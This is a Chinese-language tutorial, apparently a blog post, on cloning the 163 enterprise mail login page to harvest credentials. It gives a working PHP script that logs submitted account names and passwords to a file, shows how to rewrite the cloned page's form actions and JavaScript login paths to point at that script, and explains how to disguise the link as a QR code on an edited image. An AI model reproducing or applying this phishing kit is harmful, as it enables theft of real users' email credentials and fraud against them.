这里克隆163企业邮箱比较费劲,和之前的还不一样,这个克隆的目录比较多,发现好多工具都克隆不全,要不就是缺少图片要不就是缺少功能
首先效果
可以看到成功记录账户密码,接下来再来伪装到域名
这里克隆网站使用神器
会在My Web Sites目录下生成克隆的网站
整体克隆下的网站目录如下:
可以看到打开网页相同,然后看看功能是否正常使用
可以看到网页功能正常使用,当我们输入账户密码登录后会跳转到163邮箱
首先记录密码脚本如下:
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$account_name = $_POST['account_name'];
$password = $_POST['password'];
// 检查用户名和密码是否合法,这里应该有相应的验证逻辑
// 打开文件以追加写入
$handle = fopen('result.txt', 'ab+');
if ($handle) {
$data = "account_name: $account_name - Password: $password\n";
fwrite($handle, $data);
fclose($handle);
} else {
echo "无法打开文件 'result.txt' 进行写入。";
}
} else {
echo "非法访问。";
}
?>
参数是account_name和password,由网络请求包中获得
这里我们主要在意的点就是账户密码登录,既然登录功能可以正常使用,说明form表单是正常的,那么我们将form表单更改到我们的记录密码的login.php文件
那么需要改index.html中的form表单
整个克隆下来的文件中就两个index.html文件,一个在根目录下,一个在子目录mail.xxx.cn下
可以看到根目录下的没有form表单说明这里和我们捕获密码没关系,那么看代码,是主要跳到mail.xxx.cn/index.html,那么说明在mail.xxx.cn目录下
那么我们主要修改目录下的index.html
共三处form表单处
可以看到action跳转到了https://mailh.qiye.163.com/login/domainEntLogin,那么我们将第一处的action改完login.php
修改第二处action如下
第三处action如下
可以看到不需要修改
这样就改完了,放到vps上访问发现输入账户密码后登录还是跳转到163主页,跳转的url仍然是/login/domainEntLogin路径,那么肯定有/login/domainEntLogin没改完的地方
可以看到js中存在该路径
共两处涉及login/domainEntLogin
修改如下:
可以看到修改完成
之后发现还需要去掉script部分
<script type="text/javascript">
window.myDomain = "wanlitire.cn";
window.isCommonPage = false;
if(window.myDomain == "qiye.163.com"){
window.isCommonPage = true;
}
</script>
再次访问网站输入账号密码登录
可以看到成功抓到密码
这里有个问题就是但是跳转之后显示是这样的,所以很容易引起怀疑,之后修改吧,暂时我没想到好的方法,想到的一种思路是跳转到这个页面限制时间零点几秒之后跳转到163邮箱首页,之后修改
为了让链接更加隐藏,做成二维码的形式
使用草料二维码官网进行制作
https://cli.im/
扫码后直接跳转网站
然后在网上随便找个图片
进行p图,修改文字和二维码
可以看到成品如上,还不错